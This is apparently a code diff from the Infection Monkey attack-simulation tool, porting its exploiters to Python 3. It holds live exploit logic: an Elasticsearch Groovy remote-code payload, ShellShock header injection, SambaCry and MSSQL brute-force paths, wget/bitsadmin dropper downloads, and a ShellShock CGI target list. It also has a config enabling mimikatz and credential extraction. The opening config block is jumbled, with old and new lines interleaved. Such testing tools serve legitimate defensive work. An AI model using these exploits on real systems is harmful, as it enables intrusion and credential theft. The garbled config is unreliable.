"inaccessible_subnets": [], "inaccessible_subnets": [],
"blocked_ips": [], "blocked_ips": [],
"current_server": "192.0.2.0:5000", "current_server": "192.0.2.0:5000",
"alive": true, "alive": true,
"collect_system_info": true, "collect_system_info": true,
"extract_azure_creds": true, "extract_azure_creds": true,
"should_use_mimikatz": true, "should_use_mimikatz": true,
"depth": 2, "depth": 2,
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_date_reference_path_linux": "/bin/sh", "dropper_date_reference_path_linux": "/bin/sh",
"dropper_log_path_windows": "%temp%\\~df1562.tmp", "dropper_log_path_windows": "%temp%\\~df1562.tmp",
"dropper_log_path_linux": "/tmp/user-1562", "dropper_log_path_linux": "/tmp/user-1562",
"dropper_set_date": true, "dropper_set_date": true,
"dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe", "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe", "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_target_path_linux": "/tmp/monkey", "dropper_target_path_linux": "/tmp/monkey",
"monkey_dir_name": "monkey_dir", "monkey_dir_name": "monkey_dir",
"kill_file_path_linux": "/var/run/monkey.not", "kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not", "kill_file_path_windows": "%windir%\\monkey.not",
"dropper_try_move_first": true, "dropper_try_move_first": true,
"exploiter_classes": [ "exploiter_classes": [
"SSHExploiter", "SSHExploiter",
"SmbExploiter", "SmbExploiter",
"WmiExploiter", "WmiExploiter",
"ShellShockExploiter", "ShellShockExploiter",
"ElasticGroovyExploiter", "ElasticGroovyExploiter",
"SambaCryExploiter", "SambaCryExploiter",
"Struts2Exploiter", "Struts2Exploiter",
"WebLogicExploiter", "WebLogicExploiter",
"HadoopExploiter", "HadoopExploiter",
"VSFTPDExploiter" "VSFTPDExploiter",
], "MSSQLExploiter"
"finger_classes": [ ],
"SSHFinger", "finger_classes": [
"PingScanner", "SSHFinger",
"HTTPFinger", "PingScanner",
"SMBFinger", "HTTPFinger",
"MySQLFinger", "SMBFinger",
"MSSQLFingerprint", "MySQLFinger",
"ElasticFinger" "MSSQLFingerprint",
], "ElasticFinger"
"max_iterations": 3, ],
"monkey_log_path_windows": "%temp%\\~df1563.tmp", "max_iterations": 3,
"monkey_log_path_linux": "/tmp/user-1563", "monkey_log_path_windows": "%temp%\\~df1563.tmp",
"send_log_to_server": true, "monkey_log_path_linux": "/tmp/user-1563",
"ms08_067_exploit_attempts": 5, "send_log_to_server": true,
"user_to_add": "Monkey_IUSER_SUPPORT", "ms08_067_exploit_attempts": 5,
"remote_user_pass": "Password1!", "user_to_add": "Monkey_IUSER_SUPPORT",
"ping_scan_timeout": 10000, "remote_user_pass": "Password1!",
"smb_download_timeout": 300, "ping_scan_timeout": 10000,
"smb_service_name": "InfectionMonkey", "smb_download_timeout": 300,
"retry_failed_explotation": true, "smb_service_name": "InfectionMonkey",
"self_delete_in_cleanup": true, "retry_failed_explotation": true,
"serialize_config": false, "self_delete_in_cleanup": true,
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", "serialize_config": false,
"skip_exploit_if_file_exist": false, "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
"exploit_user_list": [], "skip_exploit_if_file_exist": false,
"exploit_password_list": [], "exploit_user_list": [],
"exploit_lm_hash_list": [], "exploit_password_list": [],
"exploit_ntlm_hash_list": [], "exploit_lm_hash_list": [],
"exploit_ssh_keys": [], "exploit_ntlm_hash_list": [],
"sambacry_trigger_timeout": 5, "exploit_ssh_keys": [],
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], "sambacry_trigger_timeout": 5,
"sambacry_shares_not_to_check": ["IPC$", "print$"], "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
"local_network_scan": false, "sambacry_shares_not_to_check": ["IPC$", "print$"],
"tcp_scan_get_banner": true, "local_network_scan": false,
"tcp_scan_interval": 0, "tcp_scan_get_banner": true,
"tcp_scan_timeout": 10000, "tcp_scan_interval": 0,
"tcp_target_ports": [ "tcp_scan_timeout": 10000,
22, "tcp_target_ports": [
445, 22,
135, 445,
3389, 135,
80, 3389,
8080, 80,
443, 8080,
3306, 443,
8008, 3306,
9200, 8008,
7001 9200,
], 7001,
"timeout_between_iterations": 10, 8088
"use_file_logging": true, ],
"victims_max_exploit": 15, "timeout_between_iterations": 10,
"victims_max_find": 100, "use_file_logging": true,
"post_breach_actions" : [] "victims_max_exploit": 15,
custom_PBA_linux_cmd = "" "victims_max_find": 100,
custom_PBA_windows_cmd = "" "post_breach_actions": []
PBA_linux_filename = None custom_PBA_linux_cmd = ""
PBA_windows_filename = None custom_PBA_windows_cmd = ""
PBA_linux_filename = None
PBA_windows_filename = None
} }


@ -0,0 +1,98 @@
from abc import abstractmethod
from infection_monkey.config import WormConfiguration
from common.utils.exploit_enum import ExploitType
from datetime import datetime
from infection_monkey.utils.plugins.plugin import Plugin
import infection_monkey.exploit
__author__ = 'itamar'
class HostExploiter(Plugin):
@staticmethod
def should_run(class_name):
"""
Decides if the exploiter is enabled in the config
:return: True if it should run, False otherwise
"""
return class_name in WormConfiguration.exploiter_classes
@staticmethod
def base_package_file():
return infection_monkey.exploit.__file__
@staticmethod
def base_package_name():
return infection_monkey.exploit.__package__
_TARGET_OS_TYPE = []
# Usual values are 'vulnerability' or 'brute_force'
EXPLOIT_TYPE = ExploitType.VULNERABILITY
@property
@abstractmethod
def _EXPLOITED_SERVICE(self):
pass
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
'started': '',
'finished': '',
'vulnerable_urls': [],
'vulnerable_ports': [],
'executed_cmds': []}
self.exploit_attempts = []
self.host = host
def set_start_time(self):
self.exploit_info['started'] = datetime.now().isoformat()
def set_finish_time(self):
self.exploit_info['finished'] = datetime.now().isoformat()
def is_os_supported(self):
return self.host.os.get('type') in self._TARGET_OS_TYPE
def send_exploit_telemetry(self, result):
from infection_monkey.telemetry.exploit_telem import ExploitTelem
ExploitTelem(self, result).send()
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
def exploit_host(self):
self.pre_exploit()
try:
result = self._exploit_host()
finally:
self.post_exploit()
return result
def pre_exploit(self):
self.set_start_time()
def post_exploit(self):
self.set_finish_time()
@abstractmethod
def _exploit_host(self):
raise NotImplementedError()
def add_vuln_url(self, url):
self.exploit_info['vulnerable_urls'].append(url)
def add_vuln_port(self, port):
self.exploit_info['vulnerable_ports'].append(port)
def add_executed_cmd(self, cmd):
"""
Appends command to exploiter's info.
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
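The notable behavioral change versus the deleted `exploit/__init__.py` version below is that `exploit_host` now wraps `_exploit_host` in `try`/`finally`, so the finish time is recorded even when exploitation raises. A trimmed sketch:

```python
from datetime import datetime

class HostExploiter:
    def __init__(self):
        self.exploit_info = {'started': '', 'finished': ''}

    def exploit_host(self):
        self.exploit_info['started'] = datetime.now().isoformat()
        try:
            result = self._exploit_host()
        finally:
            # runs even if _exploit_host raised, so telemetry always gets a finish time
            self.exploit_info['finished'] = datetime.now().isoformat()
        return result

class FailingExploiter(HostExploiter):
    def _exploit_host(self):
        raise RuntimeError("target unreachable")

e = FailingExploiter()
try:
    e.exploit_host()
except RuntimeError:
    pass
print(bool(e.exploit_info['finished']))  # → True
```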


@ -1,91 +0,0 @@
from abc import ABCMeta, abstractmethod, abstractproperty
import infection_monkey.config
from common.utils.exploit_enum import ExploitType
from datetime import datetime
__author__ = 'itamar'
class HostExploiter(object):
__metaclass__ = ABCMeta
_TARGET_OS_TYPE = []
# Usual values are 'vulnerability' or 'brute_force'
EXPLOIT_TYPE = ExploitType.VULNERABILITY
@abstractproperty
def _EXPLOITED_SERVICE(self):
pass
def __init__(self, host):
self._config = infection_monkey.config.WormConfiguration
self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
'started': '',
'finished': '',
'vulnerable_urls': [],
'vulnerable_ports': [],
'executed_cmds': []}
self.exploit_attempts = []
self.host = host
def set_start_time(self):
self.exploit_info['started'] = datetime.now().isoformat()
def set_finish_time(self):
self.exploit_info['finished'] = datetime.now().isoformat()
def is_os_supported(self):
return self.host.os.get('type') in self._TARGET_OS_TYPE
def send_exploit_telemetry(self, result):
from infection_monkey.telemetry.exploit_telem import ExploitTelem
ExploitTelem(self, result).send()
def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
def exploit_host(self):
self.pre_exploit()
result = self._exploit_host()
self.post_exploit()
return result
def pre_exploit(self):
self.set_start_time()
def post_exploit(self):
self.set_finish_time()
@abstractmethod
def _exploit_host(self):
raise NotImplementedError()
def add_vuln_url(self, url):
self.exploit_info['vulnerable_urls'].append(url)
def add_vuln_port(self, port):
self.exploit_info['vulnerable_ports'].append(port)
def add_executed_cmd(self, cmd):
"""
Appends command to exploiter's info.
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
from infection_monkey.exploit.wmiexec import WmiExploiter
from infection_monkey.exploit.smbexec import SmbExploiter
from infection_monkey.exploit.sshexec import SSHExploiter
from infection_monkey.exploit.shellshock import ShellShockExploiter
from infection_monkey.exploit.sambacry import SambaCryExploiter
from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
from infection_monkey.exploit.struts2 import Struts2Exploiter
from infection_monkey.exploit.weblogic import WebLogicExploiter
from infection_monkey.exploit.hadoop import HadoopExploiter
from infection_monkey.exploit.mssqlexec import MSSQLExploiter
from infection_monkey.exploit.vsftpd import VSFTPDExploiter


@ -8,7 +8,7 @@ import json
import logging import logging
import requests import requests
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\ from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX, \
DOWNLOAD_TIMEOUT DOWNLOAD_TIMEOUT
from infection_monkey.network.elasticfinger import ES_PORT from infection_monkey.network.elasticfinger import ES_PORT
from common.data.network_consts import ES_SERVICE from common.data.network_consts import ES_SERVICE
@ -26,8 +26,8 @@ class ElasticGroovyExploiter(WebRCE):
# attack URLs # attack URLs
MONKEY_RESULT_FIELD = "monkey_result" MONKEY_RESULT_FIELD = "monkey_result"
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
JAVA_CMD = GENERIC_QUERY \ JAVA_CMD = \
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Elastic search' _EXPLOITED_SERVICE = 'Elastic search'
@ -39,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
exploit_config['dropper'] = True exploit_config['dropper'] = True
exploit_config['url_extensions'] = ['_search?pretty'] exploit_config['url_extensions'] = ['_search?pretty']
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP} exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
return exploit_config return exploit_config
def get_open_service_ports(self, port_list, names): def get_open_service_ports(self, port_list, names):
@ -83,7 +83,7 @@ class ElasticGroovyExploiter(WebRCE):
# Overridden web_rce method that adds CMD prefix for windows command # Overridden web_rce method that adds CMD prefix for windows command
try: try:
if 'windows' in self.host.os['type']: if 'windows' in self.host.os['type']:
resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND) resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
else: else:
resp = self.exploit(url, CHECK_COMMAND) resp = self.exploit(url, CHECK_COMMAND)
if resp is True: if resp is True:


@ -59,7 +59,7 @@ class HadoopExploiter(WebRCE):
resp = json.loads(resp.content) resp = json.loads(resp.content)
app_id = resp['application-id'] app_id = resp['application-id']
# Create a random name for our application in YARN # Create a random name for our application in YARN
rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in xrange(self.RAN_STR_LEN)]) rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)])
payload = self.build_payload(app_id, rand_name, command) payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload) resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
return resp.status_code == 202 return resp.status_code == 202
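`xrange` is gone in Python 3; `range` is now the lazy equivalent. A sketch of the random-name construction (the `ID_STRING` value here is illustrative, not the project's real constant):

```python
import random
import string

ID_STRING = "MONKEY"   # hypothetical marker prefix
RAN_STR_LEN = 6

def random_app_name():
    # range replaces Python 2's xrange as the lazy integer sequence
    return ID_STRING + "".join(random.choice(string.ascii_lowercase) for _ in range(RAN_STR_LEN))

print(len(random_app_name()) == len(ID_STRING) + RAN_STR_LEN)  # → True
```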


@@ -6,19 +6,17 @@ from time import sleep
 import pymssql
 from common.utils.exploit_enum import ExploitType
-from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
 from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
 from infection_monkey.model import DROPPER_ARG
-from infection_monkey.utils.monkey_dir import get_monkey_dir_path
 from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
-from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
+from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
 LOG = logging.getLogger(__name__)
 class MSSQLExploiter(HostExploiter):
     _EXPLOITED_SERVICE = 'MSSQL'
     _TARGET_OS_TYPE = ['windows']
     EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
@@ -73,7 +71,7 @@ class MSSQLExploiter(HostExploiter):
             self.remove_temp_dir()
         except Exception as e:
-            raise ExploitingVulnerableMachineError, e.args, sys.exc_info()[2]
+            raise ExploitingVulnerableMachineError(e.args).with_traceback(sys.exc_info()[2])
         return True
@@ -144,7 +142,7 @@ class MSSQLExploiter(HostExploiter):
     def get_monkey_download_command(self):
         dst_path = get_monkey_dest_path(self.monkey_server.http_path)
-        monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\
+        monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \
             format(http_path=self.monkey_server.http_path, dst_path=dst_path)
         prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
         suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
@@ -186,12 +184,12 @@ class MSSQLExploiter(HostExploiter):
         LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
                     'aborting brute force'.format(host, port))
-        raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
+        raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
 class MSSQLLimitedSizePayload(LimitedSizePayload):
     def __init__(self, command, prefix="", suffix=""):
         super(MSSQLLimitedSizePayload, self).__init__(command=command,
                                                       max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
-                                                      prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix,
-                                                      suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
+                                                      prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
+                                                      suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
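The three-argument `raise` removed in the MSSQL exploiter is Python 2-only syntax; `with_traceback()` is the Python 3 equivalent that preserves the original stack. A minimal sketch with stand-in exception and helper names (not the project's real ones):

```python
import sys

class ExploitingVulnerableMachineError(Exception):
    """Stand-in for the project's exception class."""
    pass

def risky_step():
    # Stand-in for the payload-upload step that may fail.
    raise ValueError("payload upload failed")

def run_exploit():
    try:
        risky_step()
    except Exception as e:
        # Python 2's `raise Cls, args, tb` form is a syntax error in Python 3;
        # with_traceback() re-raises with the original traceback attached.
        raise ExploitingVulnerableMachineError(e.args).with_traceback(sys.exc_info()[2])
```

The wrapped exception still points at the frame where `risky_step` failed, which keeps post-mortem logs useful.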


@@ -16,11 +16,11 @@ from impacket.smb3structs import SMB2_IL_IMPERSONATION, SMB2_CREATE, SMB2_FLAGS_
 from impacket.smbconnection import SMBConnection
 import infection_monkey.monkeyfs as monkeyfs
-from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.model import DROPPER_ARG
 from infection_monkey.network.smbfinger import SMB_SERVICE
 from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
-from infection_monkey.exploit.tools.helpers import get_interface_to_target
+from infection_monkey.network.tools import get_interface_to_target
 from infection_monkey.pyinstaller_utils import get_binary_file_path
 from common.utils.attack_utils import ScanStatus
 from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
@@ -216,6 +216,9 @@ class SambaCryExploiter(HostExploiter):
         pattern = re.compile(r'\d*\.\d*\.\d*')
         smb_server_name = self.host.services[SMB_SERVICE].get('name')
+        if not smb_server_name:
+            LOG.info("Host: %s refused SMB connection" % self.host.ip_addr)
+            return False
         samba_version = "unknown"
         pattern_result = pattern.search(smb_server_name)
         is_vulnerable = False
@@ -227,13 +230,13 @@ class SambaCryExploiter(HostExploiter):
         elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
             is_vulnerable = True
         elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
                 samba_version_parts[1] <= "13"):
             is_vulnerable = True
         elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
                 samba_version_parts[1] <= "9"):
             is_vulnerable = True
         elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
                 samba_version_parts[1] <= "3"):
             is_vulnerable = True
         else:
             # If pattern doesn't match we can't tell what version it is. Better try
@@ -392,7 +395,7 @@ class SambaCryExploiter(HostExploiter):
         if fileName != '':
             smb2Create['Buffer'] = fileName.encode('utf-16le')
         else:
-            smb2Create['Buffer'] = '\x00'
+            smb2Create['Buffer'] = b'\x00'
         if createContexts is not None:
             smb2Create['Buffer'] += createContexts
@@ -445,7 +448,12 @@ class SambaCryExploiter(HostExploiter):
             return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
         else:
-            return SambaCryExploiter.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA,
-                                                shareMode=FILE_SHARE_READ,
-                                                creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE,
-                                                fileAttributes=0)
+            return SambaCryExploiter.create_smb(
+                smb_client,
+                treeId,
+                pathName,
+                desiredAccess=FILE_READ_DATA,
+                shareMode=FILE_SHARE_READ,
+                creationOptions=FILE_OPEN,
+                creationDisposition=FILE_NON_DIRECTORY_FILE,
+                fileAttributes=0)
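The `b'\x00'` change in the SambaCry exploiter matters because in Python 3 the SMB `Buffer` field is concatenated with other `bytes` values, and `str + bytes` raises `TypeError`. A stand-alone sketch of the same branch logic (the function name is illustrative, not a real project helper):

```python
def build_create_buffer(file_name, create_contexts=None):
    # Mirrors the Buffer handling in the hunk above: encode the file name as
    # UTF-16LE bytes, or use a single NUL byte when no name is given.
    if file_name != '':
        buf = file_name.encode('utf-16le')
    else:
        buf = b'\x00'  # bytes literal; the str '\x00' would fail to concatenate below
    if create_contexts is not None:
        buf += create_contexts  # bytes += bytes is valid; bytes += str is not
    return buf
```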



@@ -7,7 +7,7 @@ from random import choice
 import requests
 from common.utils.attack_utils import ScanStatus
-from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
 from infection_monkey.model import DROPPER_ARG
 from infection_monkey.exploit.shellshock_resources import CGI_FILES
@@ -132,7 +132,7 @@ class ShellShockExploiter(HostExploiter):
             self._remove_lock_file(exploit, url, header)
             if (http_thread.downloads != 1) or (
                     'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
                 LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
                 continue
@@ -172,14 +172,17 @@ class ShellShockExploiter(HostExploiter):
         LOG.info("File %s exists on remote host" % file_path)
         return resp
-    def attempt_exploit(self, url, attacks=_attacks):
+    def attempt_exploit(self, url, attacks=None):
         # Flag used to identify whether the exploit has successfully caused the
         # server to return a useful response
+        if not attacks:
+            attacks = self._attacks
         LOG.debug("Attack Flag is: %s" % self.success_flag)
         LOG.debug("Trying exploit for %s" % url)
-        for header, exploit in attacks.iteritems():
+        for header, exploit in list(attacks.items()):
             attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND
             result = self.attack_page(url, header, attack)
             if self.success_flag in result:
@@ -206,8 +209,8 @@ class ShellShockExploiter(HostExploiter):
         try:
             LOG.debug("Header is: %s" % header)
             LOG.debug("Attack is: %s" % attack)
-            r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT)
-            result = r.content
+            r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT)  # noqa: DUO123
+            result = r.content.decode()
             return result
         except requests.exceptions.RequestException as exc:
             LOG.debug("Failed to run, exception %s" % exc)
@@ -229,7 +232,7 @@ class ShellShockExploiter(HostExploiter):
         attack_urls = [attack_path + url for url in url_list]
         for u in attack_urls:
             try:
-                reqs.append(requests.head(u, verify=False, timeout=TIMEOUT))
+                reqs.append(requests.head(u, verify=False, timeout=TIMEOUT))  # noqa: DUO123
             except requests.Timeout:
                 timeout = True
                 break
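The `attacks=None` sentinel in `attempt_exploit` replaces a class attribute used as a default argument, which Python evaluates once at definition time and shares across every call. A minimal sketch of the pattern (the attack map and marker here are illustrative, not the exploiter's real values):

```python
_ATTACKS = {'Content-Type': '() { :;}; echo; '}  # illustrative header -> payload map

def attempt_exploit(url, attacks=None):
    # A dict default argument would be bound once and shared; the None
    # sentinel defers the lookup to call time, so callers can still override it.
    if not attacks:
        attacks = _ATTACKS
    return [(header, exploit + ' echo MARKER') for header, exploit in attacks.items()]
```

Wrapping `attacks.items()` in `list(...)`, as the diff does, also guards against the dict changing size while it is being iterated.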


@@ -1,406 +1,408 @@
 # resource for shellshock attack
 # copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
-CGI_FILES = (r'/',
+CGI_FILES = (
+    r'/',
     r'/admin.cgi',
     r'/administrator.cgi',
     r'/agora.cgi',
    r'/aktivate/cgi-bin/catgy.cgi',
    r'/analyse.cgi',
    r'/apps/web/vs_diag.cgi',
    r'/axis-cgi/buffer/command.cgi',
    r'/b2-include/b2edit.showposts.php',
    r'/bandwidth/index.cgi',
    r'/bigconf.cgi',
    r'/cartcart.cgi',
    r'/cart.cgi',
    r'/ccbill/whereami.cgi',
    r'/cgi-bin/14all-1.1.cgi',
    r'/cgi-bin/14all.cgi',
    r'/cgi-bin/a1disp3.cgi',
    r'/cgi-bin/a1stats/a1disp3.cgi',
    r'/cgi-bin/a1stats/a1disp4.cgi',
    r'/cgi-bin/addbanner.cgi',
    r'/cgi-bin/add_ftp.cgi',
    r'/cgi-bin/adduser.cgi',
    r'/cgi-bin/admin/admin.cgi',
    r'/cgi-bin/admin.cgi',
    r'/cgi-bin/admin/getparam.cgi',
    r'/cgi-bin/adminhot.cgi',
    r'/cgi-bin/admin.pl',
    r'/cgi-bin/admin/setup.cgi',
    r'/cgi-bin/adminwww.cgi',
    r'/cgi-bin/af.cgi',
    r'/cgi-bin/aglimpse.cgi',
    r'/cgi-bin/alienform.cgi',
    r'/cgi-bin/AnyBoard.cgi',
    r'/cgi-bin/architext_query.cgi',
    r'/cgi-bin/astrocam.cgi',
    r'/cgi-bin/AT-admin.cgi',
    r'/cgi-bin/AT-generate.cgi',
    r'/cgi-bin/auction/auction.cgi',
    r'/cgi-bin/auktion.cgi',
    r'/cgi-bin/ax-admin.cgi',
    r'/cgi-bin/ax.cgi',
    r'/cgi-bin/axs.cgi',
    r'/cgi-bin/badmin.cgi',
    r'/cgi-bin/banner.cgi',
    r'/cgi-bin/bannereditor.cgi',
    r'/cgi-bin/bb-ack.sh',
    r'/cgi-bin/bb-histlog.sh',
    r'/cgi-bin/bb-hist.sh',
    r'/cgi-bin/bb-hostsvc.sh',
    r'/cgi-bin/bb-replog.sh',
    r'/cgi-bin/bb-rep.sh',
    r'/cgi-bin/bbs_forum.cgi',
    r'/cgi-bin/bigconf.cgi',
    r'/cgi-bin/bizdb1-search.cgi',
    r'/cgi-bin/blog/mt-check.cgi',
    r'/cgi-bin/blog/mt-load.cgi',
    r'/cgi-bin/bnbform.cgi',
    r'/cgi-bin/book.cgi',
    r'/cgi-bin/boozt/admin/index.cgi',
    r'/cgi-bin/bsguest.cgi',
    r'/cgi-bin/bslist.cgi',
    r'/cgi-bin/build.cgi',
    r'/cgi-bin/bulk/bulk.cgi',
    r'/cgi-bin/cached_feed.cgi',
    r'/cgi-bin/cachemgr.cgi',
    r'/cgi-bin/calendar/index.cgi',
    r'/cgi-bin/cartmanager.cgi',
    r'/cgi-bin/cbmc/forums.cgi',
    r'/cgi-bin/ccvsblame.cgi',
    r'/cgi-bin/c_download.cgi',
    r'/cgi-bin/cgforum.cgi',
    r'/cgi-bin/.cgi',
    r'/cgi-bin/cgi_process',
    r'/cgi-bin/classified.cgi',
    r'/cgi-bin/classifieds.cgi',
    r'/cgi-bin/classifieds/classifieds.cgi',
    r'/cgi-bin/classifieds/index.cgi',
    r'/cgi-bin/.cobalt/alert/service.cgi',
    r'/cgi-bin/.cobalt/message/message.cgi',
    r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
    r'/cgi-bin/commandit.cgi',
    r'/cgi-bin/commerce.cgi',
    r'/cgi-bin/common/listrec.pl',
    r'/cgi-bin/compatible.cgi',
    r'/cgi-bin/Count.cgi',
    r'/cgi-bin/csChatRBox.cgi',
    r'/cgi-bin/csGuestBook.cgi',
    r'/cgi-bin/csLiveSupport.cgi',
    r'/cgi-bin/CSMailto.cgi',
    r'/cgi-bin/CSMailto/CSMailto.cgi',
    r'/cgi-bin/csNews.cgi',
    r'/cgi-bin/csNewsPro.cgi',
    r'/cgi-bin/csPassword.cgi',
    r'/cgi-bin/csPassword/csPassword.cgi',
    r'/cgi-bin/csSearch.cgi',
    r'/cgi-bin/csv_db.cgi',
    r'/cgi-bin/cvsblame.cgi',
    r'/cgi-bin/cvslog.cgi',
    r'/cgi-bin/cvsquery.cgi',
    r'/cgi-bin/cvsqueryform.cgi',
    r'/cgi-bin/day5datacopier.cgi',
    r'/cgi-bin/day5datanotifier.cgi',
    r'/cgi-bin/db_manager.cgi',
    r'/cgi-bin/dbman/db.cgi',
    r'/cgi-bin/dcforum.cgi',
    r'/cgi-bin/dcshop.cgi',
    r'/cgi-bin/dfire.cgi',
    r'/cgi-bin/diagnose.cgi',
    r'/cgi-bin/dig.cgi',
    r'/cgi-bin/directorypro.cgi',
    r'/cgi-bin/download.cgi',
    r'/cgi-bin/e87_Ba79yo87.cgi',
    r'/cgi-bin/emu/html/emumail.cgi',
    r'/cgi-bin/emumail.cgi',
    r'/cgi-bin/emumail/emumail.cgi',
    r'/cgi-bin/enter.cgi',
    r'/cgi-bin/environ.cgi',
    r'/cgi-bin/ezadmin.cgi',
    r'/cgi-bin/ezboard.cgi',
    r'/cgi-bin/ezman.cgi',
    r'/cgi-bin/ezshopper2/loadpage.cgi',
    r'/cgi-bin/ezshopper3/loadpage.cgi',
    r'/cgi-bin/ezshopper/loadpage.cgi',
    r'/cgi-bin/ezshopper/search.cgi',
    r'/cgi-bin/faqmanager.cgi',
    r'/cgi-bin/FileSeek2.cgi',
    r'/cgi-bin/FileSeek.cgi',
    r'/cgi-bin/finger.cgi',
    r'/cgi-bin/flexform.cgi',
    r'/cgi-bin/fom.cgi',
    r'/cgi-bin/fom/fom.cgi',
    r'/cgi-bin/FormHandler.cgi',
    r'/cgi-bin/FormMail.cgi',
    r'/cgi-bin/gbadmin.cgi',
